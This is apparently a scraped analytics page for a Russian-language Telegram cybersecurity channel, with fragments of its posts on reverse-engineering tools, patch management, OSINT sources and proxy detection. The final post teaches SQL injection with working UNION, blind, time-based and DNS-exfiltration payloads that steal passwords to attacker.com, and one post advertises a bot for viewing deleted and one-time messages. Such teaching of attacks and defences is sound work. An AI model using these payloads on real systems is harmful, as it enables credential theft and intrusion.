CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: CyberSec Edition
Channel CodeGuard: CyberSec Edition is an active participant. Currently, the community unites 13 327 subscribers, ranking 9 290 in the Technologies & Applications category and 48 812 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 13 327 subscribers.
According to the latest data from 03 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 158 over the last 30 days and by 6 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 11.76%. Within the first 24 hours after publication, content typically collects 5.74% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 566 views. Within the first day, a publication typically gains 765 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 6.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 04 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
Версию компилятора, архитектуру, ОС, порядок байт
Адреса функций, их имена, исходные файлы и номера строк
Имена типов (структуры, интерфейсы)
Встроенные строки (из таблицы интернирования)
Флаги сборки, buildid, информацию о модуляхИнтеграция с дизассемблерами: ⚪️Сгенерированный JSON можно загрузить в: ⚪️IDA Pro — скрипт IDAPython/goresym_rename.py ⚪️Ghidra — скрипт GhidraPython/goresym_rename.py ⚪️Binary Ninja — плагин binja-GoReSym 🔗 GitHub 😈 CodeGuard: PySec Edition | Чат
Централизованное управление патчами на множестве серверов
Агенты работают через исходящие соединения (без открытых портов)
Полная видимость состояния обновлений
Безопасная автоматизация процессов🔗 GitHub: PatchMon/PatchMon 😈 CodeGuard: PySec Edition | Чат
• Сохранять одноразовые фотографии • Смотреть удаленные сообщения • Общаться с ИИ прямо в Telegram— И это абсолютно бесплатно Ничего скачивать не нужно, просто запусти: @enterMOD_bot
Срочно обновить Next.js до патченной версии.
Изолировать IoT-устройства в отдельные VLAN.
Установить WAF (брандмауэр веб-приложений).
Мониторить запуск подозрительных процессов.
Блокировать известные C2-серверы.😈 CodeGuard: PySec Edition | Чат
Карты — топографические, спутниковые, исторические, кадастровые
Реестры — юридические лица, недвижимость, судебные дела, патенты
СМИ и соцсети — локальные новостные ресурсы, поиск по людям
Госструктуры — сайты министерств, ведомств, открытые данные
Статистика — демография, экономика, транспорт, инфраструктура🔗 Ссылка: OSINT International 😈 CodeGuard: PySec Edition | Чат
JA3/JA4-отпечатки — TLS-рукопожатие имеет уникальные характеристики, которые можно детектировать
Поведенческий анализ — даже при шифровании, паттерны трафика (размер пакетов, тайминги) могут выдать прокси
Сертификаты — даже если они "поддельные", методы анализа становятся умнееXHTTP — что это:
Новая транспортная обёртка, маскирующая прокси-трафик под обычный HTTP/3
Использует QUIC, который сложнее анализировать
Разработан для противодействия именно поведенческому анализу➡️ Полная статья 😈 CodeGuard: PySec Edition | Чат
' UNION SELECT username, password FROM users--
Суть: Крадём данные напрямую из интерфейса.
🎭 2. Blind (Слепая) — когда результат не виден
Приложение не показывает данные, но его поведение меняется. Атакующий задаёт вопросы "да/нет":
' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'--
Если условие верно — страница загружается нормально, если нет — с ошибкой или пустая. Так посимвольно угадываем пароли.
⏱️ 3. Time-based — слепая, но с таймером
Разновидность слепой, где ответ — это задержка.
' AND IF((SELECT password) LIKE 'a%', SLEEP(5), 0)--
Если первый символ пароля — a, сервер "заснёт" на 5 секунд. Долгий ответ = угадали.
🌐 4. Out-of-band (DNS-экфильтрация) — хитрый обход
Когда ничто не помогает, заставляем саму базу данных отправить нам данные. Через DNS-запрос.
sql
' UNION SELECT LOAD_FILE('\\\\'(SELECT password)'.attacker.com\\test')--
Как работает:
СУБД пытается прочитать "файл" по пути \\<украденный_пароль>.attacker.com\test.
Для этого она делает DNS-запрос к домену attacker.com.
В логах DNS-сервера злоумышленник видит полный запрос: <украденный_пароль>.attacker.com.
Данные украдены.💎 Итог:
UNION — если виден вывод.
Blind — если есть косвенная реакция.
DNS-атака — когда другие методы бессильны, но можно выполнить произвольный запрос.
Защита — не только фильтрация кавычек, а параметризованные запросы, минимальные права БД и мониторинг DNS.😈 CodeGuard: PySec Edition | Чат
